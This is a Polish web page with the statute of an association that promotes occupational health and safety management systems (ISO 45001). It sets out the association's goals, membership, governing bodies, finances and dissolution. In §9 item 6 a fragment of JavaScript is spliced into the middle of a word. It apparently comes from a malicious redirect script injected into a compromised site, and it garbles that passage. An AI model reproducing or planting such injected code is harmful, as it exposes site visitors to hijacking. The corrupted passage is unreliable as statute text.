Przejdź do treści

Statut

 Stowarzyszenia Polskie Forum Zarządzania Bezpieczeństwem i Higieną Pracy ISO 45000 Rozdział I POSTANOWIENIA OGÓLNE

 §1.

 1. Stowarzyszenie Polskie Forum Zarządzania Bezpieczeństwem i Higieną Pracy ISO 45000 zwane dalej „Stowarzyszenie Forum ISO 45000”, jest dobrowolnym i samorządnym zrzeszeniem działającym na podstawie przepisów ustawy z dnia 7 kwietnia 1989r. Prawo o stowarzyszeniu (Dz. U. z 1989 r. Nr 20, poz. 104 z późniejszymi zmianami) oraz niniejszego statutu.
 2. Stowarzyszenie może posługiwać się skróconą nazwą „Stowarzyszenie Forum ISO 45000”.

§2.

Stowarzyszenie Forum ISO 45000 swoim działaniem obejmuje obszar Rzeczypospolitej Polskiej.
 1. Terenem działania Stowarzyszenie Forum ISO 45000 jest obszar Rzeczpospolitej Polskiej, ze szczególnym uwzględnieniem Częstochowy i województwa śląskiego.
 2. Dla realizacji celów statutowych Stowarzyszenie Forum ISO 45000 może prowadzić działania poza granicami kraju na terenie innych państw, z poszanowaniem tamtejszego prawa.

§3.

Siedzibą Stowarzyszenia jest miasto Częstochowa.

§4.

Stowarzyszenie Forum ISO 45000 może być członkiem krajowych i międzynarodowych organizacji o podobnym celu działania.

§5.

Czas trwania Stowarzyszenia jest nieograniczony.

§ 6.

Stowarzyszenie Forum ISO 45000 opiera swoją działalność na społecznej pracy członków. Do prowadzenia swoich spraw może zatrudniać pracowników.

§7.

 1. Stowarzyszenie Forum ISO 45000 używa pieczęci okrągłej z napisem w otoku „Stowarzyszenie Forum ISO 45000”, z napisem po środku: „Zarząd ” oraz pieczęci podłużnej z nazwą „Stowarzyszenie Forum ISO 45000”, i adresem.
 2. Stowarzyszenie Forum ISO 45000 może posiadać własną odznakę organizacyjną oraz logo stosownie do obowiązujących przepisów.
Rozdział II CELE I SPOSOBY ICH REALIZACJI

§8.

Celem Stowarzyszenia Forum ISO 45000  jest:
 • Promowanie nowoczesnych i skutecznych rozwiązań w zakresie zarządzania bezpieczeństwem i higieną pracy w organizacjach.
 • Rozwijanie i promowanie inicjatyw, postaw i działań sprzyjających rozwojowi i rozpowszechnianiu systemów zarządzania w dziedzinie bezpieczeństwa i higieny pracy, w tym przede wszystkim opartych na normach PN-N-18001:2004; OHSAS 18001:2007; ISO 45001 i innych normach w przedmiotowym zakresie.
 • Tworzenie i propagowanie metod, technik, narzędzi, koncepcji oraz procesów realizowanych w ramach szeroko pojętych aspektów systemów bezpieczeństwa i higieny pracy, a także w obszarze tematyki bhp,
 • Integracja środowisk zajmujących się systemami zarządzania bezpieczeństwem i higieną pracy,
 • Wspieranie działań i organizacji wprowadzających systemy zarządzania bezpieczeństwem i higieną pracy, w tym również w ochronie zdrowia i bezpieczeństwa warunków pracy, ergonomii a także rehabilitacji zawodowej,
 • Tworzenie warunków do podnoszenia kwalifikacji oraz etyki zawodowej swoich członków i kadry zajmującej się systemami zarządzania bezpieczeństwem i higieną pracy.

 §9.

Stowarzyszenie Forum ISO 45000 realizuje cele przez:
 1. Działania oświatowe i edukacyjne polegające na upowszechnianiu wśród społeczeństwa wiedzy o wartościach, potrzebach i oczekiwaniach dotyczących bezpieczeństwa i higieny pracy oraz o innowacjach organizacyjnych w zakresie zarządzania,
 2. Wszechstronne propagowanie nowoczesnych metod, technik, narzędzi, koncepcji, procesów i systemów bezpieczeństwa i higieny pracy,
 3. Inicjowanie i udział w projektach wdrożeniowych dotyczących zarządzania BHP
 4. Wzajemną pomoc i współpracę członków stowarzyszenia,
 5. Organizowanie, rozwijanie i umacnianie działalności swoich klubów,
 6. Współdziałanie z administracją państwową i samorządową wszystkich szczebli oraz organizacjami kontrolnymi i instytucjami naukowymi, badawczymi, ekonomicznymi, handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlowymi i technicznymi,
 7. Współdziałanie ze stowarzyszeniami, instytutami i organizacjami społeczno-zawodowymi zajmującymi się problematyką bezpieczeństwa i higieny pracy w kraju i za granicą,
 8. Organizowanie kongresów, zjazdów, sympozjów, konferencji, seminariów i narad, szkoleń oraz warsztatów i kursów tematycznych,
 9. Organizowanie i prowadzenie szkolenia członków i osób z innych organizacji zainteresowanych działalnością stowarzyszenia,
 10. Organizowanie konkursów o tematyce ekologicznej i zarządzania środowiskowego oraz fundowanie i przyznawanie nagród,
 11. Organizowanie odczytów, spotkań dyskusyjnych, wystaw, projekcji filmów, wydawania ulotek informacyjnych itp.,
 1. Prowadzenie działalności wydawniczej oraz współpraca z wydawnictwami innych stowarzyszeń lub organizacji,
 2. Prowadzenie działalności certyfikacyjnej systemów zarządzania,
 3. Współpracę ze środkami masowego przekazu w celu promocji problematyki będącej przedmiotem działalności Stowarzyszenia Forum ISO 45000,
 4. Organizowanie i prowadzenie rzeczoznawstwa stosownie do obowiązujących przepisów,
 5. Występowanie z inicjatywą tworzenia funduszy stypendialnych i innych form pomocy,
 6. Wnioskowanie i opiniowanie w sprawach wyróżniania i nagradzania członków stowarzyszenia za wybitne osiągnięcia w realizacji celów statutowych,
 7. Prowadzenie działalności integrującej członków stowarzyszenia poprzez aktywność kulturalną, rekreacyjną i towarzyską,
 8. Działalność oświatowa w zakresie bezpieczeństwa i higieny pracy i zarządzania BHP,
 9. Działalność naukowo-techniczna ukierunkowana na tworzenie i propagowanie metod, technik, narzędzi, koncepcji oraz procesów realizowanych w ramach szeroko pojętych aspektów systemów bezpieczeństwa i higieny pracy, a także w obszarze tematyki bhp,
 10. Prezentowanie osiągnięć i promowanie członków Stowarzyszenia Forum ISO 45000.
 11. Inne działania sprzyjające osiąganiu statutowych celów organizacji.

§ 10.

Stowarzyszenie Forum ISO 45000 dla realizacji swych statutowych celów może powołać inne jednostki organizacyjne w granicach prawem dopuszczonych. Rozdział III CZŁONKOWIE , ICH PRAWA I OBOWIĄZKI

§11.

 1. Członkami Stowarzyszenia Forum ISO 45000 mogą być osoby fizyczne, podmioty posiadające osobowość prawną i organizacje nieposiadające osobowości prawnej.
 2. Członkami Stowarzyszenia Forum ISO 45000 mogą być obywatele Rzeczypospolitej Polskiej i  cudzoziemcy zarówno mający, jak i niemający miejsca zamieszkania na terytorium Rzeczypospolitej Polskiej.
 3. Członkowie Stowarzyszenia Forum ISO 45000 dzielą się na:
 4. a) członków zwyczajnych,
 5. b) członków wspierających,
 6. c) członków honorowych.
 7. Podmioty posiadające osobowość prawną i organizacje nieposiadające osobowości prawnej mogą być jedynie członkami wspierającymi Stowarzyszenia Forum ISO 45000.

§12.

Członkowie Stowarzyszenia Forum ISO 45000 obowiązani są:
 1. Swoją postawą i działaniami przyczyniać się do wzrostu roli i znaczenia Stowarzyszenia Forum ISO 45000,
 2. Dbać o dobre imię Stowarzyszenia Forum ISO 45000,
 3. Popierać i brać aktywny udział w realizacji celów Stowarzyszenia Forum ISO 45000,
 4. Przestrzegać etyki zawodowej i norm współżycia społecznego,
 5. Przestrzegać statutu, regulaminów i uchwał władz Stowarzyszenia Forum ISO 45000,
 6. Regularnie opłacać składki i inne świadczenia na rzecz Stowarzyszenia Forum ISO 45000.

§13.

 1. Członkiem zwyczajnym Stowarzyszenia Forum ISO 45000 może być osoba fizyczna, posiadająca pełną zdolność do czynności prawnych i nie pozbawiona praw publicznych. Członków zwyczajnych przyjmuje w drodze uchwały, zwykłą większością głosów, Zarząd Stowarzyszenia Forum ISO 45000, po rozpatrzeniu pisemnej deklaracji członkowskiej oraz opinii (rekomendacji), co najmniej 1 członka Stowarzyszenia Forum ISO 45000.
 2. Osoba, której odmówiono prawa członkostwa może odwołać się od takiej decyzji za pośrednictwem Zarządu do Walnego Zebrania w terminie 14 dni od dnia doręczenia stosownej uchwały.

§14.

Członek zwyczajny Stowarzyszenia Forum ISO 45000 ma prawo do:
 1. Uczestnictwa w kształtowaniu i realizacji programu Stowarzyszenia Forum ISO 45000 oraz we wszelkich formach działania służących realizacji celów statutowych i programu Stowarzyszenia Forum ISO 45000,
 2. Wypowiadania się, wyrażania opinii i wnioskowania we wszelkich kwestiach dotyczących działalności Stowarzyszenia Forum ISO 45000,
 3. Uczestniczenia w Walnym Zebraniu Członków,
 4. Korzystania z czynnego i biernego prawa wyborczego w wyborach do wszystkich władz Stowarzyszenia Forum ISO 45000,
 5. Posiadania legitymacji i noszenia odznaki Stowarzyszenia Forum ISO 45000,
 6. Korzystania w swojej działalności zawodowej z rekomendacji Stowarzyszenia Forum ISO 45000,
 7. Korzystania na preferencyjnych warunkach z lokali, urządzeń technicznych, poradnictwa i szkoleń oraz świadczeń i pomocy, które Stowarzyszenie Forum ISO 45000 stawia do dyspozycji członków,

§15.

 1. Członkiem wspierającym może być osoba fizyczna lub podmiot posiadający osobowość prawną, które zadeklarowały na rzecz Stowarzyszenia Forum ISO 45000 pomoc finansową lub rzeczową.
 2. Członkowie wspierający działają w Stowarzyszeniu Forum ISO 45000 za pośrednictwem swojego przedstawiciela.
 3. Członka wspierającego przyjmuje w drodze uchwały, zwykłą większością głosów, Zarząd Stowarzyszenia Forum ISO 45000, po rozpatrzeniu jego pisemnego oświadczenia woli, ustalając rodzaj i formę wsparcia Stowarzyszenia Forum ISO 45000.
 4. Członek wspierający podlega obowiązkom określonym w § 12 oraz posiada prawa określone w § 14, za wyjątkiem czynnego i biernego prawa wyborczego.
 5. Członek wspierający ma także prawo brać udział – z głosem doradczym w obradach Walnego Zebrania Członków Stowarzyszenia Forum ISO 45000 a także stanowić wsparcie merytoryczne w pracach Zarządu,
 6. Przedstawiciel członka wspierającego po złożeniu deklaracji na członka zwyczajnego może być przyjęty przez Zarząd w poczet członków zwyczajnych na okres posiadania przez tego przedstawiciela pełnomocnictwa do reprezentowania członka wspierającego.
 7. Przedstawiciele członków wspierających tworzą Radę Programową Stowarzyszenia Forum ISO 45000.
 8. Przewodniczący Rady Programowej uczestniczy w pracach Zarządu z głosem doradczym.

§16.

 1. Członkiem honorowym może zostać osoba fizyczna szczególnie zasłużona dla Stowarzyszenia Forum ISO 45000, która wniosła wkład w rozwój idei i realizację celów statutowych Stowarzyszenia Forum ISO 45000.
 2. Tytuł członka honorowego nadaje Walne Zebranie Członków na wniosek Zarządu Stowarzyszenia Forum ISO 45000.
 3. Członek honorowy Stowarzyszenia Forum ISO 45000 posiada wszystkie uprawnienia przysługujące członkom zwyczajnym, a ponadto nie ma obowiązku opłacania składek członkowskich.

§17.

 1. Członkostwo w Stowarzyszeniu Forum ISO 45000 ustaje na skutek:
  1. Dobrowolnej rezygnacji z przynależności do Stowarzyszenia Forum ISO 45000, zgłoszonej na piśmie Zarządowi, po uprzednim uregulowaniu wszelkich zobowiązań odnośnie Stowarzyszenia,
  2. Śmierci członka, likwidacji organizacji lub utraty osobowości prawnej przez członka wspierającego,
  3. Prawomocnego orzeczenia Sądu Koleżeńskiego,
  4. Utraty praw publicznych w wyniku prawomocnego orzeczenia sądu powszechnego,
  5. Wykluczenia za działalność sprzeczną ze statutem, regulaminem lub uchwałami Stowarzyszenia Forum ISO 45000,
  6. Nieusprawiedliwionego zalegania z opłatą składek członkowskich lub innych zobowiązań, przez okres przekraczający 6 miesięcy.
  7. O ustaniu członkostwa orzeka w drodze uchwały Zarząd podając przyczyny wykluczenia.
  8. Członek Stowarzyszania Forum ISO 45000 wykluczony na podstawie przesłanek określonych w ust. 1 pkt. c) – f) ma prawo wniesienia odwołania do Zarządu w terminie 14 dni od daty doręczenia stosownej uchwały.
  9. W przypadku utrzymania przez Zarząd w mocy decyzji o wykluczeniu członek Stowarzyszenia Forum ISO 45000 ma prawo wniesienia odwołania za pośrednictwem Zarządu do Walnego Zebrania Członków, na co najmniej 21 dni przed terminem Walnego Zebrania Członków.
  10. Uchwała Walnego Zebrania Członków jest ostateczna.
  11. W odniesieniu do prawomocnych orzeczeń Sądu Koleżeńskiego w kwestii wykluczenia członka Stowarzyszenia Forum ISO 45000 przepis ust. 4 stosuje się odpowiednio.
Rozdział IV WŁADZE STOWARZYSZENIA

§18.

Władzami Stowarzyszenia Forum ISO 45000 są: 1) Walne Zebranie Członków, 2) Zarząd, 3) Komisja Rewizyjna, 4) Sąd Koleżeński,

§19.

Uchwały Zarządu, Komisji Rewizyjnej i Sądu Koleżeńskiego zapadają zwykłą większością głosów przy obecności, co najmniej połowy członków uprawnionych do głosowania, jeśli dalsze postanowienia statutu nie stanowią inaczej.

§20

 1. Walne Zebranie Członków Stowarzyszenia Forum ISO 45000, zwane w dalszej treści Walnym Zebraniem jest najwyższą władzą Stowarzyszenia Forum ISO 45000.
 2. Walne Zebranie może być zwyczajne lub nadzwyczajne.

§21.

Do kompetencji Walnego Zebrania należy:
 1. Uchwalanie głównych kierunków działalności merytorycznej i zasad działalności finansowej Stowarzyszenia Forum ISO 45000, w tym wysokości i zasad wnoszenia składek członkowskich,
 2. Rozpatrywanie i zatwierdzanie sprawozdań z działalności Zarządu, Komisji Rewizyjnej i Sądu Koleżeńskiego,
 3. Udzielanie absolutorium ustępującemu Zarządowi na wniosek Komisji Rewizyjnej,
 4. Wybór członków Zarządu, Komisji Rewizyjnej i Sądu Koleżeńskiego,
 5. Nadawanie i pozbawianie godności członka honorowego Stowarzyszenia Forum ISO 45000,
 6. Uchwalanie zmian statutu,
 7. Podjęcie uchwały w sprawie rozwiązania Stowarzyszenia Forum ISO 45000,
 8. Rozpatrywanie odwołań wniesionych przez członków Stowarzyszenia Forum ISO 45000 od uchwał Zarządu i orzeczeń Sądu Koleżeńskiego,
 9. Podejmowanie uchwał w sprawie powoływania przez Stowarzyszenie Forum ISO 45000 jednostek organizacyjnych prawem dopuszczonych,
 10. Podejmowanie uchwał w sprawach wniesionych przez Zarząd,
 11. Rozpatrywanie skarg członków Stowarzyszenia Forum ISO 45000 na działalność Zarządu.

  §22.

 1. Walne Zebranie jest władne do podejmowania uchwał w pierwszym terminie przy obecności co najmniej połowy osób uprawnionych do głosowania, a w drugim terminie bez względu na liczbę obecnych.
 2. Walne Zebrania są prowadzone zgodnie z uchwalonym regulaminem.

  §23.

 1. W Walnym Zebraniu z głosem stanowiącym biorą udział:
 2. a) członkowie zwyczajni,
 3. b) członkowie honorowi,
 4. W Walnym Zebraniu z głosem doradczym udział biorą:
 5. a) przedstawiciele członków wspierających,
 6. b) zaproszeni goście.
 7. W głosowaniu nad udzieleniem absolutorium ustępującemu Zarządowi nie mogą brać udziału członkowie tego Zarządu.

§24.

O terminie, miejscu i porządku obrad zwyczajnego Walnego Zebrania, Zarząd zawiadamia członków co najmniej na 21 dni przed terminem rozpoczęcia obrad.

§25.

 1. Nadzwyczajne Walne Zebranie może być zwoływane z inicjatywy Zarządu, na wniosek Komisji Rewizyjnej lub co najmniej 1/2 ogólnej liczby członków zwyczajnych Stowarzyszenia Forum ISO 45000. Wniosek o zwołanie Nadzwyczajnego Walnego Zebrania powinien zawierać uzasadnienie zwołania Zebrania i jego cel.
 2. Nadzwyczajne Walne Zebranie zwołuje Zarząd w terminie 6 tygodni od daty zgłoszenia wniosku i obraduje nad sprawami, dla których zostało zwołane.
 3. Nadzwyczajne Walne Zebranie jest zwołane w trybie przewidzianym dla Zwyczajnego Walnego Zebrania.

§26

Uchwały Zarządu, Komisji Rewizyjnej i Sądu Koleżeńskiego zapadają zwykłą większością głosów przy obecności, co najmniej połowy członków uprawnionych do głosowania, jeśli dalsze postanowienia statutu nie stanowią inaczej.

§27.

Kadencja Zarządu, Komisji Rewizyjnej i Sądu Koleżeńskiego trwa 4 lata, a ich wybór odbywa się w głosowaniu tajnym w trakcie Walnego Zebrania.

§28.

Zarząd jako organ wykonawczy Stowarzyszenia Forum ISO 45000 jest odpowiedzialny za swoją działalność przed Walnym Zebraniem.

§29.

 1. Zarząd składa się z 3 do 5 członków wybieranych przez Walne Zebranie.
 2. Zarząd konstytuuje się na pierwszym zebraniu.
 3. Zarząd wyłania ze swego grona Prezesa, Vice Prezesa, Skarbnika, Sekretarza i określa inne funkcje wynikające z potrzeb działalności Stowarzyszenia Forum ISO 45000 .
 4. W przypadku złożenia rezygnacji z pełnionej funkcji przez członka Zarządu lub innej formy ustąpienia, Zarząd może do swojego składu dokooptować nowych członków w miejsce tych, którzy ustąpili, przy czym liczba dokooptowanych członków nie może przekroczyć 1/3 ogólnej liczby członków pochodzących z wyborów.

 §30.

Do kompetencji Zarządu należy: 1) reprezentowanie Stowarzyszenia Forum ISO 45000 na zewnątrz i działanie w jego imieniu, 2) kierowanie działalnością Stowarzyszenia Forum ISO 45000  zgodnie z postanowieniami statutu, wytycznymi i uchwałami Walnego Zebrania, 3) zwoływanie Walnego Zebrania w sposób przewidziany w niniejszym statucie, 4) przedstawianie sprawozdań z działalności merytorycznej i finansowej oraz projektów głównych kierunków działalności i zasad gospodarki finansowej na Walnym Zebraniu, 5) uchwalanie rocznych planów działalności merytorycznej i finansowej oraz projektów budżetów na rok       następny, 6) ustalanie zasad współpracy finansowej z członkami zwyczajnymi i wspierającymi, w tym wysokości składek i formy pomocy finansowej lub rzeczowej, 7) zarządzanie majątkiem i funduszami Stowarzyszenia Forum ISO 45000, 8) zatwierdzanie bilansu, 9) powoływanie zespołów pomocniczych dla pełnej realizacji zadań Stowarzyszenia, po określeniu szczegółowego zakresu działalności i zatwierdzeniu Uchwałą Zarządu, 10) dokonywanie corocznej oceny działalności klubów problemowych oraz jednostek działalności gospodarczej Stowarzyszenia Forum ISO 45000  i podawanie tej oceny do wiadomości członkom Stowarzyszenia Forum ISO 45000, 11) przyjmowanie i skreślanie członków, 12) występowanie z wnioskami na Walne Zebranie o nadanie lub pozbawienie członkostwa honorowego, 13) występowanie o nadania odznaczeń, nagród i wyróżnień, 14) nadawanie honorowych odznak Stowarzyszenia Forum ISO 45000, 15) inicjowanie i koordynowanie współpracy z zagranicą, 16) podejmowanie innych czynności niezastrzeżonych do kompetencji Walnego Zebrania, Komisji Rewizyjnej lub Sądu Koleżeńskiego.

§31.

 1. Uchwały Zarządu są podejmowane zwykłą większością głosów przy obecności, co najmniej połowy członków w tym Prezesa lub Sekretarza. W razie równej liczby głosów rozstrzyga głos Prezesa Zarządu lub Sekretarza w razie nieobecności Prezesa.
 2. Posiedzenia Zarządu odbywają się w miarę potrzeby, nie rzadziej jednak niż raz na trzy miesiące.
 3. Posiedzenia Zarządu mogą odbywać się zdalnie z wykorzystaniem technik telekomunikacyjnych.
 4. Posiedzenia Zarządu są zwoływane przez Prezesa lub osobę przez niego upoważnioną.

§32.

 1. Komisja Rewizyjna składa się z 3 do 5 członków wybranych przez Walne Zebranie. Komisja Rewizyjna wybiera spośród siebie przewodniczącego, jego zastępcę i sekretarza.
 2. W przypadku złożenia rezygnacji z pełnionej funkcji przez członka Komisji Rewizyjnej lub innej formy ustąpienia, Komisja może do swojego składu dokooptować nowych członków w miejsce tych, którzy ustąpili, przy czym liczba dokooptowanych członków nie może przekroczyć 1/3 ogólnej liczby członków pochodzących z wyborów.

§33.

Do kompetencji Komisji Rewizyjnej należy: 1) kontrola całokształtu działalności Stowarzyszenia ze szczególnym uwzględnieniem gospodarki finansowej pod względem celowości, prawidłowości oraz zgodności z przepisami prawa, postanowieniami statutu oraz uchwałami Walnego Zebrania, 2) składanie na Walnym Zebraniu sprawozdań ze swej działalności oraz oceny działalności merytorycznej, gospodarczej i finansowej Stowarzyszenia Forum ISO 45000  wraz z wnioskiem o udzielenie absolutorium ustępującemu Zarządowi, 3) zgłaszanie na posiedzeniach Zarządu uwag i wniosków w sprawie działalności Stowarzyszenia Forum ISO 45000.

§34.

Komisja Rewizyjna może powołać do swoich prac rzeczoznawców, biegłych lub audytorów.

§35.

Członkowie Komisji Rewizyjnej mogą brać udział z głosem doradczym w posiedzeniach wszystkich organów Stowarzyszenia Forum ISO 45000.

§36.

Komisja Rewizyjna może żądać zwołania posiedzenia Zarządu. Posiedzenie to powinno się odbyć najpóźniej w ciągu 21 dni od daty zgłoszenia wniosku.

§37.

Komisja Rewizyjna może żądać zwołania Nadzwyczajnego Walnego Zebrania w trybie ustalonym w niniejszym statucie.

§38.

Szczegółowy zakres działania Komisji Rewizyjnej określa opracowany i zatwierdzony przez jej Członków regulamin.

§39.

 1. Sąd Koleżeński składa się z 3 – 5 członków, wybranych przez Walne Zebranie. Sąd Koleżeński wybiera spośród siebie przewodniczącego, jego zastępcę i sekretarza.
 2. W przypadku złożenia rezygnacji z pełnionej funkcji przez członka Sądu Koleżeńskiego lub innej formy ustąpienia, Sąd Koleżeński może do swojego składu dokooptować nowych członków w miejsce tych, którzy ustąpili, przy czym liczba dokooptowanych członków nie może przekroczyć 1/3 ogólnej liczby członków pochodzących z wyborów.

§40.

Sąd Koleżeński Stowarzyszenia jest powołany do rozpatrywania i rozstrzygania wszelkich sporów między członkami Stowarzyszenia Forum ISO 45000  oraz do rozpatrywania spraw dotyczących nieprzestrzegania Statutu, regulaminów i uchwał władz przez członków Stowarzyszenia Forum ISO 45000.

§41.

Sąd Koleżeński może orzekać następujące kary: 1) naganę z ostrzeżeniem, 2) zawieszenie w prawach członka na okres 1 roku, 3) wykluczenie ze Stowarzyszenia Forum ISO 45000.

§42.

Od orzeczeń Sądu Koleżeńskiego przysługuje odwołanie do Walnego Zebrania w terminie 30 dni od dnia otrzymania orzeczenia.

§43.

Zakres uprawnień i tryb postępowania Sądu Koleżeńskiego określa regulamin uchwalony przez Sąd Koleżeński i zatwierdzony przez Walne Zebranie.

§44.

 1. Kluby są organizacyjnie podporządkowane Władzom Stowarzyszenia Forum ISO 45000, realizują cele Stowarzyszenia Forum ISO 45000 w zakresie określonych zagadnień, będących przedmiotem zainteresowań członków Stowarzyszenia Forum ISO 45000
 2. Zarząd Stowarzyszenia Forum ISO 45000 powołuje i odwołuje Klub Stowarzyszenia Forum ISO 45000 na wniosek zainteresowanych członków Stowarzyszenia Forum ISO 45000  (osób inicjujących działalność Klubu).
 3. Klub składa się z członków Stowarzyszenia Forum ISO 45000, którzy wybierają spośród siebie przewodniczącego, jego zastępcę i sekretarza.
 4. Kluby Stowarzyszenia Forum ISO 45000 działają na podstawie:
 5. planu pracy przedłożonego Zarządowi,
 6. regulaminu działalności Klubu zatwierdzonego przez Zarząd.
 7. Przewodniczący Klubu, opracowuje coroczne sprawozdanie z działalności i przedkłada je Zarządowi.
Rozdział V MAJĄTEK I FINANSOWANIE DZIAŁALNOŚCI STOWARZYSZENIA

§45.

 1. Majątek Stowarzyszenia Forum ISO 45000 składa się z nieruchomości, ruchomości i funduszów stanowiących własność Stowarzyszenia.
 2. Fundusz Stowarzyszenia Forum ISO 45000 powstaje ze składek członkowskich, środków pozyskanych w ramach dofinansowania, sponsoringu, darowizn, spadków, zapisów, dochodów z własnej działalności oraz ofiarności publicznej.
 3. Funduszami i majątkiem Stowarzyszenia Forum ISO 45000 zarządza Zarząd.
 4. Do składania oświadczeń woli i podpisywania zobowiązań w imieniu Stowarzyszenia Forum ISO 45000 upoważnionych jest łącznie dwóch członków Zarządu, w tym Prezes lub Skarbnik.

§46.

1.Działalność Stowarzyszenia Forum ISO 45000  jest finansowana ze środków Stowarzyszenia Forum ISO 45000. 2.Działalność Stowarzyszenia Forum ISO 45000  jest prowadzona na podstawie rocznego planu rzeczowo – finansowego,  zatwierdzanego przez Walne Zgromadzenie. 3.Koszty działalności Stowarzyszenia Forum ISO 45000  obejmują:
 1. koszty administracyjne wynikające z bieżącej działalności Stowarzyszenia Forum ISO 45000,
 2. koszty obsługi członków Stowarzyszenia Forum ISO 45000 (wysyłka materiałów, zawiadomień, koszty organizacyjne seminariów, szkoleń itp.),
 3. koszty obsługi zewnętrznej Stowarzyszenia Forum ISO 45000 – administracyjnej, finansowej, księgowej, kadrowej, prawnej,
 4. wynagrodzenia autorskie, dydaktyczne, administracyjne,
 5. koszty delegacji osób realizujących przedsięwzięcia Stowarzyszenia Forum ISO 45000,
 6. inne koszty wynikające z bieżącej działalności Stowarzyszenia Forum ISO 45000.
Rozdział VI ZMIANA STATUTU I ROZWIĄZANIE SIĘ STOWARZYSZENIA

§47.

 1. Uchwałę w sprawie zmiany Statutu podejmuje Walne Zebranie większością 2/3 głosów osób uprawnionych do głosowania obecnych na Walnym Zebraniu.
 2. Sprawa zmiany statutu powinna być umieszczona w porządku obrad Walnego Zebrania, a projektowane zmiany powinny być podane do wiadomości członkom, co najmniej na 21 dni przed terminem Walnego Zebrania.
 3. Wnioski w sprawie zmian statutu powinny być zgłoszone do Zarządu, ·co najmniej na 3 miesiące przed terminem Walnego Zebrania, o którym mowa w ust. 2.

§48.

 1. Stowarzyszenie Forum ISO 45000 rozwiązuje się na podstawie uchwały Walnego Zebrania podjętej większością 2/3 głosów osób uprawnionych do głosowania obecnych na Walnym Zebraniu lub w innych przypadkach przewidzianych w przepisach prawa.
 2. Podejmując uchwałę o rozwiązaniu Stowarzyszenia Walne Zebranie określa sposób jego likwidacji oraz przeznaczenie majątku Stowarzyszenia Forum ISO 45000. Uchwała taka podlega zgłoszeniu do Krajowego Rejestru Sądowego.
 3. W sprawach nie uregulowanych niniejszym statutem mają zastosowanie przepisy ustawy z dnia 7 kwietnia 1989 roku – Prawo o stowarzyszeniach (Dz. U. Nr 20 poz. 104 z późniejszymi zmianami).
Statut powyższy został przyjęty na Zebraniu Założycielskim w dniu 08 lutego 2016 roku